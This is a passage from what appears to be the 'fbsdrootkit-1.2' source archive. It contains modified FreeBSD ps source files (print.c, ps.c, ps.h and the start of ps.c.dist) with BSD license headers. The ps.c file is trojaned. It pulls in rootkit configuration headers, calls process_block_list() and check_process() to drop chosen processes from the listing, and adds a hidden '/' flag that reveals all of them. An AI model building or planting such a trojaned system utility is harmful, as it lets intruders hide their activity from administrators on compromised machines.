BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * $Id: print.c,v 1.7.4.4 1996/06/05 02:36:11 jkh Exp $ */ #ifndef lint static char sccsid[] = "@(#)print.c 8.6 (Berkeley) 4/16/94"; #endif /* not lint */ #include #include #include #include #include #ifdef P_PPWAIT #define NEWVM #endif #ifdef NEWVM #include #include #include #else #include #include #include #endif #include #include #include #include #include #include #include #include #include "ps.h" void printheader() { VAR *v; struct varent *vent; for (vent = vhead; vent; vent = vent->next) { v = vent->var; if (v->flag & LJUST) { if (vent->next == NULL) /* last one */ (void)printf("%s", v->header); else (void)printf("%-*s", v->width, v->header); } else (void)printf("%*s", v->width, v->header); if (vent->next != NULL) (void)putchar(' '); } (void)putchar('\n'); } void command(k, ve) KINFO *k; VARENT *ve; { VAR *v; int left; char *cp, *vis_env, *vis_args; if ((vis_args = malloc(strlen(k->ki_args) * 4 + 1)) == NULL) err(1, NULL); strvis(vis_args, k->ki_args, VIS_TAB | VIS_NL | VIS_NOSLASH); if (k->ki_env) { if ((vis_env = malloc(strlen(k->ki_env) * 4 + 1)) == NULL) err(1, NULL); strvis(vis_env, k->ki_env, VIS_TAB | VIS_NL | VIS_NOSLASH); } else vis_env = NULL; v = ve->var; if (ve->next == NULL) { /* last field */ if (termwidth == UNLIMITED) { if (vis_env) (void)printf("%s ", vis_env); (void)printf("%s", vis_args); } else { left = termwidth - (totwidth - v->width); if (left < 1) /* already wrapped, just use std width */ left = v->width; if ((cp = vis_env) != NULL) { while (--left >= 0 && *cp) (void)putchar(*cp++); if (--left >= 0) putchar(' '); } for (cp = vis_args; --left >= 0 && *cp != '\0';) (void)putchar(*cp++); } } else /* XXX env? */ (void)printf("%-*.*s", v->width, v->width, vis_args); free(vis_args); if (vis_env != NULL) free(vis_env); } void ucomm(k, ve) KINFO *k; VARENT *ve; { VAR *v; v = ve->var; (void)printf("%-*s", v->width, KI_PROC(k)->p_comm); } void logname(k, ve) KINFO *k; VARENT *ve; { VAR *v; v = ve->var; #ifndef NEWVM (void)printf("%-*s", v->width, KI_PROC(k)->p_logname); #else (void)printf("%-*s", v->width, KI_EPROC(k)->e_login); #endif } void state(k, ve) KINFO *k; VARENT *ve; { struct proc *p; int flag; char *cp; VAR *v; char buf[16]; v = ve->var; p = KI_PROC(k); flag = p->p_flag; cp = buf; switch (p->p_stat) { case SSTOP: *cp = 'T'; break; case SSLEEP: if (flag & P_SINTR) /* interuptable (long) */ *cp = p->p_slptime >= MAXSLP ? 'I' : 'S'; else *cp = 'D'; break; case SRUN: case SIDL: *cp = 'R'; break; case SZOMB: *cp = 'Z'; break; default: *cp = '?'; } cp++; if (flag & P_INMEM) { #ifndef NEWVM if (p->p_rssize > p->p_maxrss) *cp++ = '>'; #endif } else *cp++ = 'W'; if (p->p_nice < NZERO) *cp++ = '<'; else if (p->p_nice > NZERO) *cp++ = 'N'; #ifndef NEWVM if (flag & SUANOM) *cp++ = 'A'; else if (flag & SSEQL) *cp++ = 'S'; #endif if (flag & P_TRACED) *cp++ = 'X'; if (flag & P_WEXIT && p->p_stat != SZOMB) *cp++ = 'E'; #ifdef NEWVM if (flag & P_PPWAIT) #else if (flag & SVFORK) #endif *cp++ = 'V'; #ifdef NEWVM if (flag & (P_SYSTEM | P_NOSWAP | P_PHYSIO)) #else if (flag & (SSYS|SLOCK|SULOCK|SKEEP|SPHYSIO)) #endif *cp++ = 'L'; if (KI_EPROC(k)->e_flag & EPROC_SLEADER) *cp++ = 's'; if ((flag & P_CONTROLT) && KI_EPROC(k)->e_pgid == KI_EPROC(k)->e_tpgid) *cp++ = '+'; *cp = '\0'; (void)printf("%-*s", v->width, buf); } void pri(k, ve) KINFO *k; VARENT *ve; { VAR *v; v = ve->var; (void)printf("%*d", v->width, KI_PROC(k)->p_priority - PZERO); } void uname(k, ve) KINFO *k; VARENT *ve; { VAR *v; v = ve->var; #ifndef NEWVM (void)printf("%-*s", (int)v->width, user_from_uid(KI_PROC(k)->p_uid, 0)); #else (void)printf("%-*s", (int)v->width, user_from_uid(KI_EPROC(k)->e_ucred.cr_uid, 0)); #endif } void runame(k, ve) KINFO *k; VARENT *ve; { VAR *v; v = ve->var; #ifndef NEWVM (void)printf("%-*s", (int)v->width, user_from_uid(KI_PROC(k)->p_ruid, 0)); #else (void)printf("%-*s", (int)v->width, user_from_uid(KI_EPROC(k)->e_pcred.p_ruid, 0)); #endif } void tdev(k, ve) KINFO *k; VARENT *ve; { VAR *v; dev_t dev; char buff[16]; v = ve->var; dev = KI_EPROC(k)->e_tdev; if (dev == NODEV) (void)printf("%*s", v->width, "??"); else { (void)snprintf(buff, sizeof(buff), "%d/%d", major(dev), minor(dev)); (void)printf("%*s", v->width, buff); } } void tname(k, ve) KINFO *k; VARENT *ve; { VAR *v; dev_t dev; char *ttname; v = ve->var; dev = KI_EPROC(k)->e_tdev; if (dev == NODEV || (ttname = devname(dev, S_IFCHR)) == NULL) (void)printf("%*s ", v->width-1, "??"); else { if (strncmp(ttname, "tty", 3) == 0 || strncmp(ttname, "cua", 3) == 0) ttname += 3; (void)printf("%*.*s%c", v->width-1, v->width-1, ttname, KI_EPROC(k)->e_flag & EPROC_CTTY ? ' ' : '-'); } } void longtname(k, ve) KINFO *k; VARENT *ve; { VAR *v; dev_t dev; char *ttname; v = ve->var; dev = KI_EPROC(k)->e_tdev; if (dev == NODEV || (ttname = devname(dev, S_IFCHR)) == NULL) (void)printf("%-*s", v->width, "??"); else (void)printf("%-*s", v->width, ttname); } void started(k, ve) KINFO *k; VARENT *ve; { VAR *v; static time_t now; struct tm *tp; char buf[100]; v = ve->var; if (!k->ki_u.u_valid) { (void)printf("%-*s", v->width, "-"); return; } tp = localtime(&k->ki_u.u_start.tv_sec); if (!now) (void)time(&now); if (now - k->ki_u.u_start.tv_sec < 24 * 3600) { /* I *hate* SCCS... */ static char fmt[] = __CONCAT("%l:%", "M%p"); (void)strftime(buf, sizeof(buf) - 1, fmt, tp); } else if (now - k->ki_u.u_start.tv_sec < 7 * 86400) { /* I *hate* SCCS... */ static char fmt[] = __CONCAT("%a%", "I%p"); (void)strftime(buf, sizeof(buf) - 1, fmt, tp); } else (void)strftime(buf, sizeof(buf) - 1, "%e%b%y", tp); (void)printf("%-*s", v->width, buf); } void lstarted(k, ve) KINFO *k; VARENT *ve; { VAR *v; char buf[100]; v = ve->var; if (!k->ki_u.u_valid) { (void)printf("%-*s", v->width, "-"); return; } (void)strftime(buf, sizeof(buf) -1, "%C", localtime(&k->ki_u.u_start.tv_sec)); (void)printf("%-*s", v->width, buf); } void wchan(k, ve) KINFO *k; VARENT *ve; { VAR *v; v = ve->var; if (KI_PROC(k)->p_wchan) { if (KI_PROC(k)->p_wmesg) (void)printf("%-*.*s", v->width, v->width, KI_EPROC(k)->e_wmesg); else (void)printf("%-*x", v->width, (int)KI_PROC(k)->p_wchan &~ KERNBASE); } else (void)printf("%-*s", v->width, "-"); } #define pgtok(a) (((a)*NBPG)/1024) void vsize(k, ve) KINFO *k; VARENT *ve; { VAR *v; v = ve->var; (void)printf("%*d", v->width, #ifndef NEWVM pgtok(KI_PROC(k)->p_dsize + KI_PROC(k)->p_ssize + KI_EPROC(k)->e_xsize)); #else pgtok(KI_EPROC(k)->e_vm.vm_dsize + KI_EPROC(k)->e_vm.vm_ssize + KI_EPROC(k)->e_vm.vm_tsize)); #endif } void rssize(k, ve) KINFO *k; VARENT *ve; { VAR *v; v = ve->var; #ifndef NEWVM (void)printf("%*d", v->width, pgtok(KI_PROC(k)->p_rssize + (KI_EPROC(k)->e_xccount ? (KI_EPROC(k)->e_xrssize / KI_EPROC(k)->e_xccount) : 0))); #else /* XXX don't have info about shared */ (void)printf("%*d", v->width, pgtok(KI_EPROC(k)->e_vm.vm_rssize)); #endif } void p_rssize(k, ve) /* doesn't account for text */ KINFO *k; VARENT *ve; { VAR *v; v = ve->var; #ifndef NEWVM (void)printf("%*d", v->width, pgtok(KI_PROC(k)->p_rssize)); #else (void)printf("%*ld", v->width, pgtok(KI_EPROC(k)->e_vm.vm_rssize)); #endif } void cputime(k, ve) KINFO *k; VARENT *ve; { VAR *v; long secs; long psecs; /* "parts" of a second. first micro, then centi */ char obuff[128]; v = ve->var; if (KI_PROC(k)->p_stat == SZOMB || !k->ki_u.u_valid) { secs = 0; psecs = 0; } else { /* * This counts time spent handling interrupts. We could * fix this, but it is not 100% trivial (and interrupt * time fractions only work on the sparc anyway). XXX */ secs = KI_PROC(k)->p_rtime.tv_sec; psecs = KI_PROC(k)->p_rtime.tv_usec; if (sumrusage) { secs += k->ki_u.u_cru.ru_utime.tv_sec + k->ki_u.u_cru.ru_stime.tv_sec; psecs += k->ki_u.u_cru.ru_utime.tv_usec + k->ki_u.u_cru.ru_stime.tv_usec; } /* * round and scale to 100's */ psecs = (psecs + 5000) / 10000; secs += psecs / 100; psecs = psecs % 100; } (void)snprintf(obuff, sizeof(obuff), "%3ld:%02ld.%02ld", secs/60, secs%60, psecs); (void)printf("%*s", v->width, obuff); } double getpcpu(k) KINFO *k; { struct proc *p; static int failure; if (!nlistread) failure = donlist(); if (failure) return (0.0); p = KI_PROC(k); #define fxtofl(fixpt) ((double)(fixpt) / fscale) /* XXX - I don't like this */ if (p->p_swtime == 0 || (p->p_flag & P_INMEM) == 0) return (0.0); if (rawcpu) return (100.0 * fxtofl(p->p_pctcpu)); return (100.0 * fxtofl(p->p_pctcpu) / (1.0 - exp(p->p_swtime * log(fxtofl(ccpu))))); } void pcpu(k, ve) KINFO *k; VARENT *ve; { VAR *v; v = ve->var; (void)printf("%*.1f", v->width, getpcpu(k)); } double getpmem(k) KINFO *k; { static int failure; struct proc *p; struct eproc *e; double fracmem; int szptudot; if (!nlistread) failure = donlist(); if (failure) return (0.0); p = KI_PROC(k); e = KI_EPROC(k); if ((p->p_flag & P_INMEM) == 0) return (0.0); #ifndef NEWVM szptudot = UPAGES + clrnd(ctopt(p->p_dsize + p->p_ssize + e->e_xsize)); fracmem = ((float)p->p_rssize + szptudot)/CLSIZE/mempages; if (p->p_textp && e->e_xccount) fracmem += ((float)e->e_xrssize)/CLSIZE/e->e_xccount/mempages; #else /* XXX want pmap ptpages, segtab, etc. (per architecture) */ szptudot = UPAGES; /* XXX don't have info about shared */ fracmem = ((float)e->e_vm.vm_rssize + szptudot)/CLSIZE/mempages; #endif return (100.0 * fracmem); } void pmem(k, ve) KINFO *k; VARENT *ve; { VAR *v; v = ve->var; (void)printf("%*.1f", v->width, getpmem(k)); } void pagein(k, ve) KINFO *k; VARENT *ve; { VAR *v; v = ve->var; (void)printf("%*ld", v->width, k->ki_u.u_valid ? k->ki_u.u_ru.ru_majflt : 0); } void maxrss(k, ve) KINFO *k; VARENT *ve; { VAR *v; v = ve->var; #ifndef NEWVM /* not yet */ if (KI_PROC(k)->p_maxrss != (RLIM_INFINITY/NBPG)) (void)printf("%*d", v->width, pgtok(KI_PROC(k)->p_maxrss)); else #endif (void)printf("%*s", v->width, "-"); } void tsize(k, ve) KINFO *k; VARENT *ve; { VAR *v; v = ve->var; #ifndef NEWVM (void)printf("%*d", v->width, pgtok(KI_EPROC(k)->e_xsize)); #else (void)printf("%*ld", v->width, pgtok(KI_EPROC(k)->e_vm.vm_tsize)); #endif } #ifndef NEWVM void trss(k, ve) KINFO *k; VARENT *ve; { VAR *v; v = ve->var; (void)printf("%*d", v->width, pgtok(KI_EPROC(k)->e_xrssize)); } #endif /* * Generic output routines. Print fields from various prototype * structures. */ static void printval(bp, v) char *bp; VAR *v; { static char ofmt[32] = "%"; char *fcp, *cp; cp = ofmt + 1; fcp = v->fmt; if (v->flag & LJUST) *cp++ = '-'; *cp++ = '*'; while ((*cp++ = *fcp++)); switch (v->type) { case CHAR: (void)printf(ofmt, v->width, *(char *)bp); break; case UCHAR: (void)printf(ofmt, v->width, *(u_char *)bp); break; case SHORT: (void)printf(ofmt, v->width, *(short *)bp); break; case USHORT: (void)printf(ofmt, v->width, *(u_short *)bp); break; case LONG: (void)printf(ofmt, v->width, *(long *)bp); break; case ULONG: (void)printf(ofmt, v->width, *(u_long *)bp); break; case KPTR: (void)printf(ofmt, v->width, *(u_long *)bp &~ KERNBASE); break; default: errx(1, "unknown type %d", v->type); } } void pvar(k, ve) KINFO *k; VARENT *ve; { VAR *v; v = ve->var; printval((char *)((char *)KI_PROC(k) + v->off), v); } void evar(k, ve) KINFO *k; VARENT *ve; { VAR *v; v = ve->var; printval((char *)((char *)KI_EPROC(k) + v->off), v); } void uvar(k, ve) KINFO *k; VARENT *ve; { VAR *v; v = ve->var; if (k->ki_u.u_valid) printval((char *)((char *)&k->ki_u + v->off), v); else (void)printf("%*s", v->width, "-"); } void rvar(k, ve) KINFO *k; VARENT *ve; { VAR *v; v = ve->var; if (k->ki_u.u_valid) printval((char *)((char *)(&k->ki_u.u_ru) + v->off), v); else (void)printf("%*s", v->width, "-"); } fbsdrootkit-1.2/ps/ps.c100600 764 764 31102 6257600576 12375 0ustar dfdf/*- * Copyright (c) 1990, 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * $Id: ps.c,v 1.7.4.3 1996/06/05 02:36:12 jkh Exp $ */ #ifndef lint static char copyright[] = "@(#) Copyright (c) 1990, 1993, 1994\n\ The Regents of the University of California. All rights reserved.\n"; #endif /* not lint */ #ifndef lint static char sccsid[] = "@(#)ps.c 8.4 (Berkeley) 4/2/94"; #endif /* not lint */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "ps.h" #ifdef P_PPWAIT #define NEWVM #endif /* Rootkit configuration files */ #include "../config.h" #include "../rootkitps.h" KINFO *kinfo; struct varent *vhead, *vtail; int eval; /* exit value */ int rawcpu; /* -C */ int sumrusage; /* -S */ int termwidth; /* width of screen (0 == infinity) */ int totwidth; /* calculated width of requested variables */ static int needuser, needcomm, needenv; enum sort { DEFAULT, SORTMEM, SORTCPU } sortby = DEFAULT; static char *fmt __P((char **(*)(kvm_t *, const struct kinfo_proc *, int), KINFO *, char *, int)); static char *kludge_oldps_options __P((char *)); static int pscomp __P((const void *, const void *)); static void saveuser __P((KINFO *)); static void scanvars __P((void)); static void usage __P((void)); char dfmt[] = "pid tt state time command"; char jfmt[] = "user pid ppid pgid sess jobc state tt time command"; char lfmt[] = "uid pid ppid cpu pri nice vsz rss wchan state tt time command"; char o1[] = "pid"; char o2[] = "tt state time command"; char ufmt[] = "user pid %cpu %mem vsz rss tt state start time command"; char vfmt[] = "pid state time sl re pagein vsz rss lim tsiz %cpu %mem command"; kvm_t *kd; int main(argc, argv) int argc; char *argv[]; { struct kinfo_proc *kp; struct varent *vent; struct winsize ws; struct passwd *pwd; dev_t ttydev; pid_t pid; uid_t uid; int all, ch, flag, i, fmt, lineno, nentries; int prtheader, wflag, what, xflg; char *nlistf, *memf, *swapf, errbuf[256]; if ((ioctl(STDOUT_FILENO, TIOCGWINSZ, (char *)&ws) == -1 && ioctl(STDERR_FILENO, TIOCGWINSZ, (char *)&ws) == -1 && ioctl(STDIN_FILENO, TIOCGWINSZ, (char *)&ws) == -1) || ws.ws_col == 0) termwidth = 79; else termwidth = ws.ws_col - 1; if (argc > 1) argv[1] = kludge_oldps_options(argv[1]); all = fmt = prtheader = wflag = xflg = 0; pid = -1; uid = (uid_t) -1; ttydev = NODEV; memf = nlistf = swapf = NULL; while ((ch = getopt(argc, argv, #if defined(SHOWFLAG) "aCeghjLlM:mN:O:o:p:rSTt:U:uvW:wx/")) != EOF) #else "aCeghjLlM:mN:O:o:p:rSTt:U:uvW:wx")) != EOF) #endif switch((char)ch) { case 'a': all = 1; break; case 'e': /* XXX set ufmt */ needenv = 1; break; case 'C': rawcpu = 1; break; case 'g': break; /* no-op */ case 'h': prtheader = ws.ws_row > 5 ? ws.ws_row : 22; break; case 'j': parsefmt(jfmt); fmt = 1; jfmt[0] = '\0'; break; case 'L': showkey(); exit(0); case 'l': parsefmt(lfmt); fmt = 1; lfmt[0] = '\0'; break; case 'M': memf = optarg; break; case 'm': sortby = SORTMEM; break; case 'N': nlistf = optarg; break; case 'O': parsefmt(o1); parsefmt(optarg); parsefmt(o2); o1[0] = o2[0] = '\0'; fmt = 1; break; case 'o': parsefmt(optarg); fmt = 1; break; case 'p': pid = atol(optarg); xflg = 1; break; case 'r': sortby = SORTCPU; break; case 'S': sumrusage = 1; break; case 'T': if ((optarg = ttyname(STDIN_FILENO)) == NULL) errx(1, "stdin: not a terminal"); /* FALLTHROUGH */ case 't': { struct stat sb; char *ttypath, pathbuf[MAXPATHLEN]; if (strcmp(optarg, "co") == 0) ttypath = _PATH_CONSOLE; else if (*optarg != '/') (void)snprintf(ttypath = pathbuf, sizeof(pathbuf), "%s%s", _PATH_TTY, optarg); else ttypath = optarg; if (stat(ttypath, &sb) == -1) err(1, "%s", ttypath); if (!S_ISCHR(sb.st_mode)) errx(1, "%s: not a terminal", ttypath); ttydev = sb.st_rdev; break; } case 'U': pwd = getpwnam(optarg); if (pwd == NULL) errx(1, "%s: no such user", optarg); uid = pwd->pw_uid; endpwent(); xflg++; /* XXX: intuitive? */ break; case 'u': parsefmt(ufmt); sortby = SORTCPU; fmt = 1; ufmt[0] = '\0'; break; case 'v': parsefmt(vfmt); sortby = SORTMEM; fmt = 1; vfmt[0] = '\0'; break; case 'W': swapf = optarg; break; case 'w': if (wflag) termwidth = UNLIMITED; else if (termwidth < 131) termwidth = 131; wflag++; break; case 'x': xflg = 1; break; /* Show all processes if the capability is enabled */ #if defined(SHOWFLAG) case '/': show_all++; break; #endif case '?': default: usage(); } argc -= optind; argv += optind; #define BACKWARD_COMPATIBILITY #ifdef BACKWARD_COMPATIBILITY if (*argv) { nlistf = *argv; if (*++argv) { memf = *argv; if (*++argv) swapf = *argv; } } #endif /* * Discard setgid privileges if not the running kernel so that bad * guys can't print interesting stuff from kernel memory. */ if (nlistf != NULL || memf != NULL || swapf != NULL) setgid(getgid()); kd = kvm_openfiles(nlistf, memf, swapf, O_RDONLY, errbuf); if (kd == 0) errx(1, "%s", errbuf); if (!fmt) parsefmt(dfmt); /* XXX - should be cleaner */ if (!all && ttydev == NODEV && pid == -1 && uid == (uid_t)-1) uid = getuid(); /* * scan requested variables, noting what structures are needed, * and adjusting header widths as appropiate. */ scanvars(); /* * get proc list */ if (uid != (uid_t) -1) { what = KERN_PROC_UID; flag = uid; } else if (ttydev != NODEV) { what = KERN_PROC_TTY; flag = ttydev; } else if (pid != -1) { what = KERN_PROC_PID; flag = pid; } else { what = KERN_PROC_ALL; flag = 0; } /* * select procs */ /* Read in a list of processes to block */ if(!show_all) process_block_list(); if ((kp = kvm_getprocs(kd, what, flag, &nentries)) == 0) errx(1, "%s", kvm_geterr(kd)); if ((kinfo = malloc(nentries * sizeof(*kinfo))) == NULL) err(1, NULL); for (i = nentries; --i >= 0; ++kp) { kinfo[i].ki_p = kp; if (needuser) saveuser(&kinfo[i]); } /* * print header */ printheader(); if (nentries == 0) exit(0); /* * sort proc list */ qsort(kinfo, nentries, sizeof(KINFO), pscomp); /* * for each proc, call each variable output function. */ for (i = lineno = 0; i < nentries; i++) { /* Check whether process should be blocked */ if(!show_all && check_process(kinfo[i].ki_p)) continue; if (xflg == 0 && (KI_EPROC(&kinfo[i])->e_tdev == NODEV || (KI_PROC(&kinfo[i])->p_flag & P_CONTROLT ) == 0)) continue; for (vent = vhead; vent; vent = vent->next) { (vent->var->oproc)(&kinfo[i], vent); if (vent->next != NULL) (void)putchar(' '); } (void)putchar('\n'); if (prtheader && lineno++ == prtheader - 4) { (void)putchar('\n'); printheader(); lineno = 0; } } exit(eval); } static void scanvars() { struct varent *vent; VAR *v; int i; for (vent = vhead; vent; vent = vent->next) { v = vent->var; i = strlen(v->header); if (v->width < i) v->width = i; totwidth += v->width + 1; /* +1 for space */ if (v->flag & USER) needuser = 1; if (v->flag & COMM) needcomm = 1; } totwidth--; } static char * fmt(fn, ki, comm, maxlen) char **(*fn) __P((kvm_t *, const struct kinfo_proc *, int)); KINFO *ki; char *comm; int maxlen; { char *s; if ((s = fmt_argv((*fn)(kd, ki->ki_p, termwidth), comm, maxlen)) == NULL) err(1, NULL); return (s); } static void saveuser(ki) KINFO *ki; { struct pstats pstats; struct usave *usp; struct user *u_addr = (struct user *)USRSTACK; usp = &ki->ki_u; if (kvm_uread(kd, KI_PROC(ki), (unsigned long)&u_addr->u_stats, (char *)&pstats, sizeof(pstats)) == sizeof(pstats)) { /* * The u-area might be swapped out, and we can't get * at it because we have a crashdump and no swap. * If it's here fill in these fields, otherwise, just * leave them 0. */ usp->u_start = pstats.p_start; usp->u_ru = pstats.p_ru; usp->u_cru = pstats.p_cru; usp->u_valid = 1; } else usp->u_valid = 0; /* * save arguments if needed */ if (needcomm) ki->ki_args = fmt(kvm_getargv, ki, KI_PROC(ki)->p_comm, MAXCOMLEN); else ki->ki_args = NULL; if (needenv) ki->ki_env = fmt(kvm_getenvv, ki, (char *)NULL, 0); else ki->ki_env = NULL; } static int pscomp(a, b) const void *a, *b; { int i; #ifdef NEWVM #define VSIZE(k) (KI_EPROC(k)->e_vm.vm_dsize + KI_EPROC(k)->e_vm.vm_ssize + \ KI_EPROC(k)->e_vm.vm_tsize) #else #define VSIZE(k) ((k)->ki_p->p_dsize + (k)->ki_p->p_ssize + (k)->ki_e->e_xsize) #endif if (sortby == SORTCPU) return (getpcpu((KINFO *)b) - getpcpu((KINFO *)a)); if (sortby == SORTMEM) return (VSIZE((KINFO *)b) - VSIZE((KINFO *)a)); i = KI_EPROC((KINFO *)a)->e_tdev - KI_EPROC((KINFO *)b)->e_tdev; if (i == 0) i = KI_PROC((KINFO *)a)->p_pid - KI_PROC((KINFO *)b)->p_pid; return (i); } /* * ICK (all for getopt), would rather hide the ugliness * here than taint the main code. * * ps foo -> ps -foo * ps 34 -> ps -p34 * * The old convention that 't' with no trailing tty arg means the users * tty, is only supported if argv[1] doesn't begin with a '-'. This same * feature is available with the option 'T', which takes no argument. */ static char * kludge_oldps_options(s) char *s; { size_t len; char *newopts, *ns, *cp; len = strlen(s); if ((newopts = ns = malloc(len + 2)) == NULL) err(1, NULL); /* * options begin with '-' */ if (*s != '-') *ns++ = '-'; /* add option flag */ /* * gaze to end of argv[1] */ cp = s + len - 1; /* * if last letter is a 't' flag with no argument (in the context * of the oldps options -- option string NOT starting with a '-' -- * then convert to 'T' (meaning *this* terminal, i.e. ttyname(0)). */ if (*cp == 't' && *s != '-') *cp = 'T'; else { /* * otherwise check for trailing number, which *may* be a * pid. */ while (cp >= s && isdigit(*cp)) --cp; } cp++; memmove(ns, s, (size_t)(cp - s)); /* copy up to trailing number */ ns += cp - s; /* * if there's a trailing number, and not a preceding 'p' (pid) or * 't' (tty) flag, then assume it's a pid and insert a 'p' flag. */ if (isdigit(*cp) && (cp == s || (cp[-1] != 't' && cp[-1] != 'p')) && (cp - 1 == s || cp[-2] != 't')) *ns++ = 'p'; (void)strcpy(ns, cp); /* and append the number */ return (newopts); } static void usage() { (void)fprintf(stderr, "usage:\t%s\n\t %s\n\t%s\n", "ps [-aChjlmrSTuvwx] [-O|o fmt] [-p pid] [-t tty] [-U user]", "[-M core] [-N system] [-W swap]", "ps [-L]"); exit(1); } fbsdrootkit-1.2/ps/ps.h100600 764 764 6522 5640731120 12353 0ustar dfdf/*- * Copyright (c) 1990, 1993 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * @(#)ps.h 8.1 (Berkeley) 5/31/93 * $Id: ps.h,v 1.2 1994/09/24 02:56:48 davidg Exp $ */ #define UNLIMITED 0 /* unlimited terminal width */ enum type { CHAR, UCHAR, SHORT, USHORT, LONG, ULONG, KPTR }; struct usave { struct timeval u_start; struct rusage u_ru; struct rusage u_cru; char u_acflag; char u_valid; }; #define KI_PROC(ki) (&(ki)->ki_p->kp_proc) #define KI_EPROC(ki) (&(ki)->ki_p->kp_eproc) typedef struct kinfo { struct kinfo_proc *ki_p; /* proc structure */ struct usave ki_u; /* interesting parts of user */ char *ki_args; /* exec args */ char *ki_env; /* environment */ } KINFO; /* Variables. */ typedef struct varent { struct varent *next; struct var *var; } VARENT; typedef struct var { char *name; /* name(s) of variable */ char *header; /* default header */ char *alias; /* aliases */ #define COMM 0x01 /* needs exec arguments and environment (XXX) */ #define LJUST 0x02 /* left adjust on output (trailing blanks) */ #define USER 0x04 /* needs user structure */ u_int flag; /* output routine */ void (*oproc) __P((struct kinfo *, struct varent *)); short width; /* printing width */ /* * The following (optional) elements are hooks for passing information * to the generic output routines: pvar, evar, uvar (those which print * simple elements from well known structures: proc, eproc, usave) */ int off; /* offset in structure */ enum type type; /* type of element */ char *fmt; /* printf format */ char *time; /* time format */ /* * glue to link selected fields together */ } VAR; #include "extern.h" fbsdrootkit-1.2/ps/ps.c.dist100600 764 764 30133 6251656647 13346 0ustar dfdf/*- * Copyright (c) 1990, 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES 